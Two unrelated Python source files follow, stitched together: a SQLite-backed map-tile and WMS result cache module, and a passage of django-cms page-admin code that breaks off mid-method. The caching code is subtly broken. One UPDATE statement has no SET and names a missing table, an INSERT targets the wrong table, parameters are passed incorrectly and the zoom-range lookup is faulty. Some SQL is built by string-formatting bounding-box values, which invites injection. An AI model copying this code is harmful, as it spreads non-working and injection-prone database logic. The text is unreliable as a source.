def num2deg(xtile, ytile, zoom):
"""
Tile number to degree of southwest point.
:param xtile: column
:param ytile: row
:param zoom: mercator zoom level
:return: the degree of the southwest corner as a lat/lon pair.
"""
n = 2.0 ** zoom
lon_deg = xtile / n * 360.0 - 180.0
lat_rad = math.atan(math.sinh(math.pi * (1 - 2 * ytile / n)))
lat_deg = math.degrees(lat_rad)
return (lon_deg, lat_deg)
class MBTileCache(object):
"""
MBTiles is MapBox's tile cache format. We use it to store rendered tiles for display in a compact format.
"""
STANDARD_SRS = "+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null"
def __init__(self, layers, styles, bgcolor=None, transparent=True, query=None, srs=STANDARD_SRS, **kwargs):
"""
Defines a cache that is specific to a set of layers, styles, spatial reference, and extra keyword args that
are passed to the renderer.
NOTE: currently only the standard SRS is supported. This relies on the slippy map tile specification for
geodetic coordinate to tile index location.
:param layers: A list of layer identifier strings
:param styles: A list of style identifier strings
:param srs: A spatial reference system in proj.4 format. Typically (and by standard) Google Mercator
:param kwargs: Extra keyword args to pass to the renderer
"""
self.srs = srs
self.name = CacheManager.cache_entry_name(layers, self.srs, styles, bgcolor, transparent, query)
self.cachename = self.name + '.mbtiles'
self.layers = layers if not isinstance(layers, basestring) else [layers]
self.styles = styles if not isinstance(styles, basestring) else [styles]
self.kwargs = kwargs
# build a coordinate transformation based on the spatial reference passed in
e4326 = osr.SpatialReference()
e3857 = osr.SpatialReference()
e4326.ImportFromEPSG(4326)
e3857.ImportFromEPSG(3857)
self.crx = osr.CoordinateTransformation(e4326, e3857)
self.cache = self._ensure_cache_initted()
def _ensure_cache_initted(self):
if not os.path.exists(self.cachename):
_log.info("Creating new tile cache for {0}".format(self.name))
conn = db.connect(self.cachename)
cursor = conn.cursor()
cursor.executescript("""
BEGIN TRANSACTION;
CREATE TABLE android_metadata (locale text);
CREATE TABLE grid_key (grid_id TEXT,key_name TEXT);
CREATE TABLE grid_utfgrid (grid_id TEXT,grid_utfgrid BLOB);
CREATE TABLE keymap (key_name TEXT,key_json TEXT);
CREATE TABLE images (tile_data blob,tile_id text);
CREATE TABLE map
(zoom_level INTEGER,tile_column INTEGER,tile_row INTEGER,tile_id TEXT,grid_id TEXT);
CREATE TABLE metadata (name text,value text);
CREATE VIEW tiles
AS SELECT
map.zoom_level AS zoom_level,
map.tile_column AS tile_column,
map.tile_row AS tile_row,
images.tile_data AS tile_data
FROM map
JOIN images ON images.tile_id = map.tile_id
ORDER BY zoom_level,tile_column,tile_row;
CREATE VIEW grids
AS SELECT
map.zoom_level AS zoom_level,
map.tile_column AS tile_column,
map.tile_row AS tile_row,
grid_utfgrid.grid_utfgrid AS grid
FROM map
JOIN grid_utfgrid ON grid_utfgrid.grid_id = map.grid_id;
CREATE VIEW grid_data
AS SELECT
map.zoom_level AS zoom_level,
map.tile_column AS tile_column,
map.tile_row AS tile_row,
keymap.key_name AS key_name,
keymap.key_json AS key_json
FROM map
JOIN grid_key ON map.grid_id = grid_key.grid_id
JOIN keymap ON grid_key.key_name = keymap.key_name;
CREATE UNIQUE INDEX grid_key_lookup ON grid_key (grid_id,key_name);
CREATE UNIQUE INDEX grid_utfgrid_lookup ON grid_utfgrid (grid_id);
CREATE UNIQUE INDEX keymap_lookup ON keymap (key_name);
CREATE UNIQUE INDEX images_id ON images (tile_id);
CREATE UNIQUE INDEX map_index ON map (zoom_level, tile_column, tile_row);
CREATE UNIQUE INDEX name ON metadata (name);
END TRANSACTION;
ANALYZE;
VACUUM;
""")
cursor.close()
return conn
else:
return db.connect(self.cachename)
def fetch_tile(self, z, x, y):
"""
Fetch map by slippy map tile ID. Render it if it's not rendered already.
:param z: zoom level
:param x: x
:param y: y
:return:
"""
tile_id = u':'.join(str(k) for k in (z,x,y))
sw = self.crx.TransformPoint(*num2deg(x, y+1, z))
ne = self.crx.TransformPoint(*num2deg(x+1, y, z))
width = 256
height = 256
insert_map = "INSERT OR REPLACE INTO map (tile_id,zoom_level,tile_column,tile_row,grid_id) VALUES(?,?,?,?,'');"
insert_data = "INSERT OR REPLACE INTO images (tile_id,tile_data) VALUES(?,?);"
c = self.cache.cursor()
c.execute("SELECT tile_data FROM images WHERE tile_id=?", [tile_id])
try:
rendered = False
blob = buffer(c.fetchone()[0])
except:
rendered = True
dispatch.tile_rendered.send(sender=CacheManager, layers=self.layers, styles=self.styles)
if getattr(settings, 'USE_CELERY', False):
from terrapyn.geocms.tasks import render as delayed_render
blob = delayed_render.delay(
'png', width, height,
(sw[0], sw[1], ne[0], ne[1]), self.srs, self.styles, self.layers, **self.kwargs).get()
else:
from terrapyn.geocms.rendering import Renderer
filename, blob = Renderer().render(
'png',
width,
height,
(sw[0], sw[1], ne[0], ne[1]),
self.srs,
self.styles,
self.layers,
**self.kwargs)
if len(blob) > 350:
blob = buffer(blob)
d = self.cache.cursor()
d.execute(insert_map, [tile_id, z, x, y])
d.execute(insert_data, [tile_id, blob])
self.cache.commit()
d.close()
c.close()
return rendered, blob
def seed_tiles(self, min_zoom, max_zoom, minx, miny, maxx, maxy):
"""
Force rendering of tiles for an area.
:param min_zoom:
:param max_zoom:
:param minx:
:param miny:
:param maxx:
:param maxy:
:return:
"""
for z in range(min_zoom, max_zoom+1):
mnx, mny = deg2num(miny, minx, z)
mxx, mxy = deg2num(maxy, maxx, z)
for x in range(mnx, mxx+1):
for y in range(mny, mxy+1):
self.fetch_tile(z, x, y)
@classmethod
def shave_cache(cls, filename, bbox):
"""
Empties a bounding box out of the cache at all zoom levels to be regenerated on demand. For supporting
minor edits on data.
:param filename:
:param bbox:
:return:
"""
x1, y1, x2, y2 = bbox
conn = db.connect(filename)
c = conn.cursor()
c.execute('select min(zoom_level) from map')
c.execute('select max(zoom_level) from map')
min_zoom = c.fetchone()
max_zoom = c.fetchone()
if min_zoom:
min_zoom = min_zoom[0]
else:
min_zoom = 0
if max_zoom:
max_zoom = max_zoom[0]
else:
max_zoom = 32
c.close()
c = conn.cursor()
del_map_entry = """
DELETE FROM map WHERE
tile_column >= ? AND
tile_row >= ? AND
tile_column <= ? AND
tile_row <= ? AND
zoom_level = ?
"""
del_tile_data = """
DELETE FROM images
WHERE tile_id IN (
SELECT tile_id
FROM map WHERE
tile_column >= ? AND
tile_row >= ? AND
tile_column <= ? AND
tile_row <= ? AND
zoom_level = ?
)
"""
e4326 = osr.SpatialReference()
e3857 = osr.SpatialReference()
e4326.ImportFromEPSG(4326)
e3857.ImportFromEPSG(3857)
crx = osr.CoordinateTransformation(e3857, e4326)
x1, y1, _ = crx.TransformPoint(x1, y1)
x2, y2, _ = crx.TransformPoint(x2, y2)
for zoom in range(min_zoom, max_zoom+1):
a1, b1 = deg2num(y1, x1, zoom)
a2, b2 = deg2num(y2, x2, zoom)
c.execute(del_tile_data, [a1, b1, a2, b2, zoom])
c.execute(del_map_entry, [a1, b1, a2, b2, zoom])
c.execute('ANALYZE')
c.execute('VACUUM')
conn.commit()
conn.close()
class WMSResultsCache(object):
"""
Cache for rendered WMS results.
"""
def __init__(self, layers, srs, styles, **kwargs):
self.name = CacheManager.cache_entry_name(
layers, srs, styles,
bgcolor=kwargs.get('bgcolor', None),
transparent=kwargs.get('transparent', False),
query=kwargs.get('query', None)
)
self.cachename = self.name + '.wmscache'
self.srs = srs
self.layers = layers
self.styles = styles
self.kwargs = kwargs
if os.path.exists(self.cachename):
conn = db.connect(self.cachename)
conn.enable_load_extension(True)
conn.execute("select load_extension('libspatialite.so')")
else:
conn = db.connect(self.cachename)
conn.enable_load_extension(True)
conn.execute("select load_extension('libspatialite.so')")
cursor = conn.cursor()
cursor.executescript("""
BEGIN TRANSACTION;
SELECT InitSpatialMetadata();
CREATE TABLE tiles (hash_key TEXT, last_use DATETIME, tile_data BLOB);
SELECT AddGeometryColumn('tiles','bounds', 4326, 'POLYGON', 'XY');
SELECT CreateSpatialIndex('tiles','bounds');
CREATE UNIQUE INDEX hash_key_lookup ON tiles (hash_key);
CREATE INDEX lru ON tiles (last_use);
END TRANSACTION;
ANALYZE;
VACUUM;
""")
cursor.close()
self.cache = conn
@classmethod
def shave_cache(self, filename, bbox):
"""
Empties a cache of all records overlapping a certain bounding box so they are regenerated on demand. For
supporting minor edits on data
:param filename:
:param bbox:
:return:
"""
x1,y1,x2,y2 = bbox
conn = db.connect(filename)
conn.execute('delete from tiles where Intersects(bounds, BuildMBR({x1},{y1},{x2},{y2}))'.format(**locals()))
conn.close()
def fetch_data(self, fmt, width, height, bbox, srs, styles, layers, **kwargs):
"""
Fetch the rendered map data for a particular bounding box or render it.
:param fmt:
:param width:
:param height:
:param bbox:
:param srs:
:param styles:
:param layers:
:param kwargs:
:return:
"""
cache_basis_for_spec = CacheManager.cache_entry_name(
layers, srs, styles,
bgcolor=kwargs.get('bgcolor', None),
transparent=kwargs.get('transparent', False),
query=kwargs.get('query', None)
)
filename = "{name}.{bbox}.{width}x{height}.{fmt}".format(
name=cache_basis_for_spec,
bbox='_'.join(str(b) for b in bbox),
width=width,
height=height,
fmt=fmt
)
c = self.cache.cursor()
c.execute("UPDATE tile_data last_use = datetime('now') WHERE hash_key=?", filename)
c.execute('SELECT tile_data FROM tiles WHERE hash_key=?', filename)
insert_data = """
INSERT INTO tile_data (hash_key, last_use, tile_data, bounds)
VALUES (
?,
datetime('now'),
?,
GeomFromText('POLYGON(({x1} {y1}, {x2} {y1}, {x2} {y2}, {x1} {y2}, {x1} {y1})')
)
""".format(x1=bbox[0],y1=bbox[1],x2=bbox[2],y2=bbox[3])
try:
blob = c.fetchone()[0]
except:
from terrapyn.geocms.drivers import render
dispatch.wms_rendered.send(CacheManager, layers=self.layers, styles=self.styles)
tile_id, blob = render('png', width, height, bbox, self.srs, self.styles,
self.layers, **self.kwargs)
with self.cache.cursor() as d:
d.execute(insert_data, filename, blob)
return blob
class CacheManager(object):
@staticmethod
def cache_entry_name(layers, styles, srs=MBTileCache.STANDARD_SRS, bgcolor=None, transparent=True, query=None):
"""
Calculate a cache entry name based on parameters that would create a unique tile set
:param layers: a list of layer identifiers (strings)
:param srs: a spatial reference string (typically proj.4 or EPSG code)
:param styles: a list of style identifiers (strings)
:param bgcolor: a hextuple of RGB background color
:param transparent: whether or not the background is transparent
:param query: a query that limits the results
:return: a path/base_file_name string that can be used to create a set of files
"""
d = OrderedDict(layers=layers, srs=srs, styles=styles, bgcolor=bgcolor, transparent=transparent)
if query: # insert the query keys, but ensure a consistent order
keys = sorted(query.keys())
for k in keys:
d[k] = query[k]
shortname = md5()
for key, value in d.items():
shortname.update(key)
shortname.update(unicode(value))
cache_entry_basename = shortname.hexdigest()
return os.path.join(LAYER_CACHE_PATH, cache_entry_basename)
def __init__(self, layer_id_field='slug', style_id_field='slug'):
"""
Create the cache.
:param layer_id_field: the name of the attribute on the layer class that designates its id
:param style_id_field: the name of the attribute on the style class that designates its id
"""
self.cachename = os.path.join(LAYER_CACHE_PATH, 'directory.sqlite')
self.tile_caches = {}
self.wms_caches = {}
self.layer_id_field = layer_id_field
self.style_id_field = style_id_field
if os.path.exists(self.cachename):
conn = db.connect(self.cachename)
else:
conn = db.connect(self.cachename)
cursor = conn.cursor()
cursor.executescript("""
BEGIN TRANSACTION;
CREATE TABLE caches (name text PRIMARY KEY, kind text);
CREATE TABLE layers (slug text primary key, cache_name text);
CREATE TABLE styles (slug text primary key, cache_name text);
END TRANSACTION;
ANALYZE;
VACUUM;
""")
conn.commit()
self.conn = conn
@classmethod
def get(cls):
"""
Get a thread-local object for this cache manager
:return:
"""
import threading
if not hasattr(cls, '_mgr'):
cls._mgr = threading.local()
if not hasattr(cls._mgr, 'mgr'):
cls._mgr.mgr = CacheManager()
return cls._mgr.mgr
def get_tile_cache(self, layers, styles, bgcolor=None, transparent=True, query=None, srs=MBTileCache.STANDARD_SRS):
"""
Get the tile cache for a unique set of layers, styles
:param layers: a list of Layer objects (or analogues) or string layer identifiers
:param styles: a list of Style objects (or analogues) or string stylesheet identifiers
:param bgcolor: a hextuple of RGB background color
:param transparent: whether or not the background is transparent
:param query: a query that limits the results
:param srs: a spatial reference identifier or proj.4 string
:return: an MBTileCache object
"""
name = CacheManager.cache_entry_name(
layers,
srs,
styles,
bgcolor,
transparent,
query
)
c = self.conn.cursor()
c.execute("INSERT OR REPLACE INTO caches (name, kind) VALUES (:name, :kind)", {"name": name, "kind": "tile" })
for layer in layers:
c.execute("INSERT OR REPLACE INTO layers (slug, cache_name) VALUES (:layer, :name)", {
"layer": layer if isinstance(layer, basestring) else getattr(layer, self.layer_id_field),
"name": name
})
for style in styles:
c.execute("INSERT OR REPLACE INTO styles (slug, cache_name) VALUES (:style, :name)", {
"style": style if isinstance(style, basestring) else getattr(style, self.style_id_field),
"name": name
})
self.conn.commit()
if name not in self.tile_caches:
self.tile_caches[name] = MBTileCache(layers, styles,
bgcolor,
transparent,
query
)
return self.tile_caches[name]
def get_wms_cache(self, layers, srs, styles, **kwargs):
name = CacheManager.cache_entry_name(
layers, srs, styles,
bgcolor=kwargs.get('bgcolor', None),
transparent=kwargs.get('transparent', True),
query=kwargs.get('query', None)
)
if name not in self.wms_caches:
self.wms_caches[name] = WMSResultsCache(
layers,
styles=styles,
srs=srs,
bgcolor=kwargs.get('bgcolor', None),
transparent=kwargs.get('transparent', True),
query=kwargs.get('query', None)
)
return self.wms_caches[name]
def shave_caches(self, layers, bbox):
"""Iterate over all caches using a particular resource and remove any resources overlapping the bounding box"""
c = self.conn.cursor()
c.executemany(
'select cache_name from layers where slug=?',
[(layer if isinstance(layer, basestring) else getattr(layer, self.layer_id_field)) for layer in layers]
)
for (k,) in c.fetchall():
MBTileCache.shave_cache(k+'.mbtiles', bbox.extent)
def remove_caches_for_layer(self, layer):
"""Iterate over all the caches using a particular layer and burn them"""
c = self.conn.cursor()
c.execute(
'select cache_name from layers where slug=?',
[layer if isinstance(layer, basestring) else getattr(layer, self.layer_id_field)]
)
for (k,) in c.fetchall():
if os.path.exists(k + '.mbtiles'):
os.unlink(k + '.mbtiles')
if os.path.exists(k + '.json'):
os.unlink(k + '.json')
if os.path.exists(k + '.wmsresults'):
os.unlink(k + '.wmsresults')
if os.path.exists(k + '.mml'):
os.unlink(k + '.mml')
if os.path.exists(k + '.xml'):
os.unlink(k + '.xml')
if os.path.exists(k + '.carto'):
os.unlink(k + '.carto')
c.execute('delete from caches where name=?', [k])
c.execute('delete from layers where cache_name=?', [k])
c.execute('delete from styles where cache_name=?', [k])
def remove_caches_for_style(self, style):
"""Iterate over all caches using a particular stylesheet and burn them"""
c = self.conn.cursor()
c.execute('select cache_name from styles where slug=?', [
style if isinstance(style, basestring) else getattr(style, self.style_id_field)])
for (k,) in c.fetchall():
if os.path.exists(k + '.mbtiles'):
os.unlink(k + '.mbtiles')
if os.path.exists(k + '.json'):
os.unlink(k + '.json')
if os.path.exists(k + '.wmsresults'):
os.unlink(k + '.wmsresults')
if os.path.exists(k + '.mml'):
os.unlink(k + '.mml')
if os.path.exists(k + '.xml'):
os.unlink(k + '.xml')
if os.path.exists(k + '.carto'):
os.unlink(k + '.carto')
c.execute('delete from caches where name=?', [k])
c.execute('delete from layers where cache_name=?', [k])
c.execute('delete from styles where cache_name=?', [k])
def layer_cache_size(self, layer):
sz = 0
c = self.conn.cursor()
c.execute(
'select cache_name from layers where slug=?',
[layer if isinstance(layer, basestring) else getattr(layer, self.layer_id_field)]
)
for (k,) in c.fetchall():
if os.path.exists(k + '.mbtiles'):
sz += os.stat(k + '.mbtiles').st_size
return sz
def resource_cache_size(resource):
from terrapyn.geocms import models as m
self = CacheManager()
return sum(self.layer_cache_size(layer) for layer in
m.Layer.objects.filter(
data_resource__slug=resource if isinstance(resource, basestring) else resource.slug
)
)
def remove_caches_for_resource(resource):
"""Iterate over all caches using a particular resource and burn them"""
from terrapyn.geocms import models as m
self = CacheManager()
for layer in m.Layer.objects.filter(data_resource__slug = resource):
self.remove_caches_for_layer(layer.slug)
|
|
# -*- coding: utf-8 -*-
from cms.admin.change_list import CMSChangeList
from cms.admin.dialog.views import get_copy_dialog
from cms.admin.forms import PageForm, PageAddForm
from cms.admin.permissionadmin import (PAGE_ADMIN_INLINES,
PagePermissionInlineAdmin, ViewRestrictionInlineAdmin)
from cms.admin.views import revert_plugins
from cms.apphook_pool import apphook_pool
from cms.exceptions import NoPermissionsException
from cms.forms.widgets import PluginEditor
from cms.models import (Page, Title, CMSPlugin, PagePermission,
PageModeratorState, EmptyTitle, GlobalPagePermission)
from cms.models.managers import PagePermissionsPermissionManager
from cms.models.placeholdermodel import Placeholder
from cms.plugin_pool import plugin_pool
from cms.utils import (copy_plugins, helpers, moderator, permissions, plugins,
get_template_from_request, get_language_from_request,
placeholder as placeholder_utils, admin as admin_utils, cms_static_url)
from cms.utils.permissions import has_plugin_permission
from copy import deepcopy
from django import template
from django.conf import settings
from django.contrib import admin
from django.contrib.admin.options import IncorrectLookupParameters
from django.contrib.admin.util import unquote, get_deleted_objects
from django.contrib.sites.models import Site
from django.core.exceptions import PermissionDenied, ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.db import transaction, models
from django.forms import CharField
from django.http import (HttpResponseRedirect, HttpResponse, Http404,
HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotAllowed)
from django.shortcuts import render_to_response, get_object_or_404
from django.template.context import RequestContext
from django.template.defaultfilters import (title, escape, force_escape,
escapejs)
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext, ugettext_lazy as _
from menus.menu_pool import menu_pool
import django
import inspect
# silly hack to test features/ fixme
if inspect.getargspec(get_deleted_objects)[0][-1] == 'using':
from django.db import router
else:
router = False
if 'reversion' in settings.INSTALLED_APPS:
import reversion
from reversion.admin import VersionAdmin as ModelAdmin
create_on_success = reversion.revision.create_on_success
else: # pragma: no cover
from django.contrib.admin import ModelAdmin
create_on_success = lambda x: x
def contribute_fieldsets(cls):
if settings.CMS_MENU_TITLE_OVERWRITE:
general_fields = [('title', 'menu_title')]
else:
general_fields = ['title']
general_fields += ['slug', ('published', 'in_navigation')]
additional_hidden_fields = []
advanced_fields = ['reverse_id', 'overwrite_url', 'redirect', 'login_required', 'limit_visibility_in_menu']
template_fields = ['template']
hidden_fields = ['site', 'parent']
seo_fields = []
if settings.CMS_SOFTROOT:
advanced_fields.append('soft_root')
if settings.CMS_SHOW_START_DATE and settings.CMS_SHOW_END_DATE:
general_fields.append(('publication_date', 'publication_end_date'))
elif settings.CMS_SHOW_START_DATE:
general_fields.append('publication_date')
elif settings.CMS_SHOW_END_DATE:
general_fields.append( 'publication_end_date')
if settings.CMS_MODERATOR:
additional_hidden_fields += ['moderator_state', 'moderator_message']
if settings.CMS_SEO_FIELDS:
seo_fields = ['page_title', 'meta_description', 'meta_keywords']
if not settings.CMS_URL_OVERWRITE:
advanced_fields.remove("overwrite_url")
if not settings.CMS_REDIRECTS:
advanced_fields.remove('redirect')
if menu_pool.get_menus_by_attribute("cms_enabled", True):
advanced_fields.append("navigation_extenders")
if apphook_pool.get_apphooks():
advanced_fields.append("application_urls")
fieldsets = [
(None, {
'fields': general_fields,
'classes': ('general',),
}),
(_('Basic Settings'), {
'fields': template_fields,
'classes': ('low',),
'description': _('Note: This page reloads if you change the selection. Save it first.'),
}),
(_('Hidden'), {
'fields': hidden_fields + additional_hidden_fields,
'classes': ('hidden',),
}),
(_('Advanced Settings'), {
'fields': advanced_fields,
'classes': ('collapse',),
}),
]
if settings.CMS_SEO_FIELDS:
fieldsets.append((_("SEO Settings"), {
'fields': seo_fields,
'classes': ('collapse',),
}))
setattr(cls, 'fieldsets', fieldsets)
setattr(cls, 'advanced_fields', advanced_fields)
setattr(cls, 'hidden_fields', hidden_fields)
setattr(cls, 'general_fields', general_fields)
setattr(cls, 'template_fields', template_fields)
setattr(cls, 'additional_hidden_fields', additional_hidden_fields)
setattr(cls, 'seo_fields', seo_fields)
def contribute_list_filter(cls):
list_filter = ['published', 'in_navigation', 'template', 'changed_by']
if settings.CMS_MODERATOR:
list_filter.append('moderator_state')
if settings.CMS_SOFTROOT:
list_filter.append('soft_root')
setattr(cls, 'list_filter', list_filter)
class PageAdmin(ModelAdmin):
form = PageForm
# TODO: add the new equivalent of 'cmsplugin__text__body' to search_fields'
search_fields = ('title_set__slug', 'title_set__title', 'reverse_id')
revision_form_template = "admin/cms/page/revision_form.html"
recover_form_template = "admin/cms/page/recover_form.html"
exclude = []
mandatory_placeholders = ('title', 'slug', 'parent', 'site', 'meta_description', 'meta_keywords', 'page_title', 'menu_title')
add_general_fields = ['title', 'slug', 'language', 'template']
change_list_template = "admin/cms/page/change_list.html"
# take care with changing fieldsets, get_fieldsets() method removes some
# fields depending on permissions, but its very static!!
add_fieldsets = [
(None, {
'fields': add_general_fields,
'classes': ('general',),
}),
(_('Hidden'), {
'fields': ['site', 'parent'],
'classes': ('hidden',),
}),
]
inlines = PAGE_ADMIN_INLINES
class Media:
css = {
'all': [cms_static_url(path) for path in (
'css/rte.css',
'css/pages.css',
'css/change_form.css',
'css/jquery.dialog.css',
)]
}
js = ['%sjs/jquery.min.js' % settings.ADMIN_MEDIA_PREFIX] + [cms_static_url(path) for path in [
'js/plugins/admincompat.js',
'js/libs/jquery.query.js',
'js/libs/jquery.ui.core.js',
'js/libs/jquery.ui.dialog.js',
]
]
def get_urls(self):
"""Get the admin urls
"""
from django.conf.urls.defaults import patterns, url
info = "%s_%s" % (self.model._meta.app_label, self.model._meta.module_name)
pat = lambda regex, fn: url(regex, self.admin_site.admin_view(fn), name='%s_%s' % (info, fn.__name__))
url_patterns = patterns('',
pat(r'copy-plugins/$', self.copy_plugins),
pat(r'add-plugin/$', self.add_plugin),
pat(r'edit-plugin/([0-9]+)/$', self.edit_plugin),
pat(r'remove-plugin/$', self.remove_plugin),
pat(r'move-plugin/$', self.move_plugin),
pat(r'^([0-9]+)/delete-translation/$', self.delete_translation),
pat(r'^([0-9]+)/move-page/$', self.move_page),
pat(r'^([0-9]+)/copy-page/$', self.copy_page),
pat(r'^([0-9]+)/change-status/$', self.change_status),
pat(r'^([0-9]+)/change-navigation/$', self.change_innavigation),
pat(r'^([0-9]+)/jsi18n/$', self.redirect_jsi18n),
pat(r'^([0-9]+)/permissions/$', self.get_permissions),
pat(r'^([0-9]+)/moderation-states/$', self.get_moderation_states),
pat(r'^([0-9]+)/change-moderation/$', self.change_moderation),
pat(r'^([0-9]+)/approve/$', self.approve_page), # approve page
pat(r'^([0-9]+)/publish/$', self.publish_page), # publish page
pat(r'^([0-9]+)/remove-delete-state/$', self.remove_delete_state),
pat(r'^([0-9]+)/dialog/copy/$', get_copy_dialog), # copy dialog
pat(r'^([0-9]+)/preview/$', self.preview_page), # copy dialog
pat(r'^(?P<object_id>\d+)/change_template/$', self.change_template), # copy dialog
)
url_patterns = url_patterns + super(PageAdmin, self).get_urls()
return url_patterns
def redirect_jsi18n(self, request):
return HttpResponseRedirect(reverse('admin:jsi18n'))
def save_model(self, request, obj, form, change):
"""
Move the page in the tree if neccesary and save every placeholder
Content object.
"""
target = request.GET.get('target', None)
position = request.GET.get('position', None)
if 'recover' in request.path:
pk = obj.pk
if obj.parent_id:
parent = Page.objects.get(pk=obj.parent_id)
else:
parent = None
obj.lft = 0
obj.rght = 0
obj.tree_id = 0
obj.level = 0
obj.pk = None
obj.insert_at(parent, save=False)
obj.pk = pk
obj.save(no_signals=True)
obj.save()
else:
if 'history' in request.path:
old_obj = Page.objects.get(pk=obj.pk)
obj.level = old_obj.level
obj.parent_id = old_obj.parent_id
obj.rght = old_obj.rght
obj.lft = old_obj.lft
obj.tree_id = old_obj.tree_id
force_with_moderation = target is not None and position is not None and \
moderator.will_require_moderation(target, position)
obj.save(force_with_moderation=force_with_moderation)
if 'recover' in request.path or 'history' in request.path:
obj.pagemoderatorstate_set.all().delete()
if settings.CMS_MODERATOR:
from cms.utils.moderator import page_changed
page_changed(obj, force_moderation_action=PageModeratorState.ACTION_CHANGED)
revert_plugins(request, obj.version.pk, obj)
language = form.cleaned_data['language']
if target is not None and position is not None:
try:
target = self.model.objects.get(pk=target)
except self.model.DoesNotExist:
pass
else:
obj.move_to(target, position)
Title.objects.set_or_create(
request,
obj,
form,
language,
)
# is there any moderation message? save/update state
if settings.CMS_MODERATOR and 'moderator_message' in form.cleaned_data and \
form.cleaned_data['moderator_message']:
moderator.update_moderation_message(obj, form.cleaned_data['moderator_message'])
if obj and "reversion" in settings.INSTALLED_APPS:
helpers.make_revision_with_plugins(obj)
@create_on_success
def change_template(self, request, object_id):
page = get_object_or_404(Page, pk=object_id)
if page.has_change_permission(request):
to_template = request.POST.get("template", None)
if to_template in dict(settings.CMS_TEMPLATES):
page.template = to_template
page.save()
if "reversion" in settings.INSTALLED_APPS:
helpers.make_revision_with_plugins(page)
return HttpResponse(str("ok"))
else:
return HttpResponseBadRequest("template not valid")
else:
return HttpResponseForbidden(_("You have no permission to change the template"))
def get_fieldsets(self, request, obj=None):
"""
Add fieldsets of placeholders to the list of already existing
fieldsets.
"""
placeholders_template = get_template_from_request(request, obj)
if obj: # edit
given_fieldsets = deepcopy(self.fieldsets)
if not obj.has_publish_permission(request):
l = list(given_fieldsets[0][1]['fields'][2])
l.remove('published')
given_fieldsets[0][1]['fields'][2] = tuple(l)
for placeholder_name in self.get_fieldset_placeholders(placeholders_template):
name = placeholder_utils.get_placeholder_conf("name", placeholder_name, obj.template, placeholder_name)
name = _(name)
given_fieldsets += [(title(name), {'fields':[placeholder_name], 'classes':['plugin-holder']})]
advanced = given_fieldsets.pop(3)
if obj.has_advanced_settings_permission(request):
given_fieldsets.append(advanced)
if settings.CMS_SEO_FIELDS:
seo = given_fieldsets.pop(3)
given_fieldsets.append(seo)
else: # new page
given_fieldsets = deepcopy(self.add_fieldsets)
return given_fieldsets
def get_fieldset_placeholders(self, template):
return plugins.get_placeholders(template)
def get_form(self, request, obj=None, **kwargs):
"""
Get PageForm for the Page model and modify its fields depending on
the request.
"""
language = get_language_from_request(request, obj)
if obj:
self.inlines = PAGE_ADMIN_INLINES
if not obj.has_publish_permission(request) and not 'published' in self.exclude:
self.exclude.append('published')
elif 'published' in self.exclude:
self.exclude.remove('published')
if not settings.CMS_SOFTROOT and 'soft_root' in self.exclude:
self.exclude.remove('soft_root')
form = super(PageAdmin, self).get_form(request, obj, **kwargs)
version_id = None
versioned = False
if "history" in request.path or 'recover' in request.path:
versioned = True
version_id = request.path.split("/")[-2]
else:
self.inlines = []
form = PageAddForm
if obj:
try:
title_obj = obj.get_title_obj(language=language, fallback=False, version_id=version_id, force_reload=True)
except:
title_obj = EmptyTitle()
if form.base_fields['site'].initial is None:
form.base_fields['site'].initial = obj.site
for name in ['slug',
'title',
'application_urls',
'redirect',
'meta_description',
'meta_keywords',
'menu_title',
'page_title']:
form.base_fields[name].initial = getattr(title_obj, name)
if title_obj.overwrite_url:
form.base_fields['overwrite_url'].initial = title_obj.path
else:
form.base_fields['overwrite_url'].initial = ""
if settings.CMS_TEMPLATES:
selected_template = get_template_from_request(request, obj)
template_choices = list(settings.CMS_TEMPLATES)
form.base_fields['template'].choices = template_choices
form.base_fields['template'].initial = force_unicode(selected_template)
placeholders = plugins.get_placeholders(selected_template)
for placeholder_name in placeholders:
plugin_list = []
show_copy = False
copy_languages = {}
if versioned:
from reversion.models import Version
version = get_object_or_404(Version, pk=version_id)
installed_plugins = plugin_pool.get_all_plugins()
plugin_list = []
actual_plugins = []
bases = {}
revs = []
for related_version in version.revision.version_set.all():
try:
rev = related_version.object_version
except models.FieldDoesNotExist:
# in case the model has changed in the meantime
continue
else:
revs.append(rev)
for rev in revs:
pobj = rev.object
if pobj.__class__ == Placeholder:
if pobj.slot == placeholder_name:
placeholder = pobj
break
for rev in revs:
pobj = rev.object
if pobj.__class__ == CMSPlugin:
if pobj.language == language and pobj.placeholder_id == placeholder.id and not pobj.parent_id:
if pobj.get_plugin_class() == CMSPlugin:
plugin_list.append(pobj)
else:
bases[int(pobj.pk)] = pobj
if hasattr(pobj, "cmsplugin_ptr_id"):
actual_plugins.append(pobj)
for plugin in actual_plugins:
if int(plugin.cmsplugin_ptr_id) in bases:
bases[int(plugin.cmsplugin_ptr_id)].placeholder = placeholder
bases[int(plugin.cmsplugin_ptr_id)].set_base_attr(plugin)
plugin_list.append(plugin)
else:
placeholder, created = obj.placeholders.get_or_create(slot=placeholder_name)
installed_plugins = plugin_pool.get_all_plugins(placeholder_name, obj)
plugin_list = CMSPlugin.objects.filter(language=language, placeholder=placeholder, parent=None).order_by('position')
other_plugins = CMSPlugin.objects.filter(placeholder=placeholder, parent=None).exclude(language=language)
dict_cms_languages = dict(settings.CMS_LANGUAGES)
for plugin in other_plugins:
if (not plugin.language in copy_languages) and (plugin.language in dict_cms_languages):
copy_languages[plugin.language] = dict_cms_languages[plugin.language]
language = get_language_from_request(request, obj)
if copy_languages and len(settings.CMS_LANGUAGES) > 1:
show_copy = True
widget = PluginEditor(attrs={
'installed': installed_plugins,
'list': plugin_list,
'copy_languages': copy_languages.items(),
'show_copy': show_copy,
'language': language,
'placeholder': placeholder
})
form.base_fields[placeholder.slot] = CharField(widget=widget, required=False)
else:
for name in ['slug','title']:
form.base_fields[name].initial = u''
form.base_fields['parent'].initial = request.GET.get('target', None)
form.base_fields['site'].initial = request.session.get('cms_admin_site', None)
form.base_fields['template'].initial = settings.CMS_TEMPLATES[0][0]
if obj and not obj.has_advanced_settings_permission(request):
for field in self.advanced_fields:
del form.base_fields[field]
return form
# remove permission inlines, if user isn't allowed to change them
def get_formsets(self, request, obj=None):
if obj:
for inline in self.inline_instances:
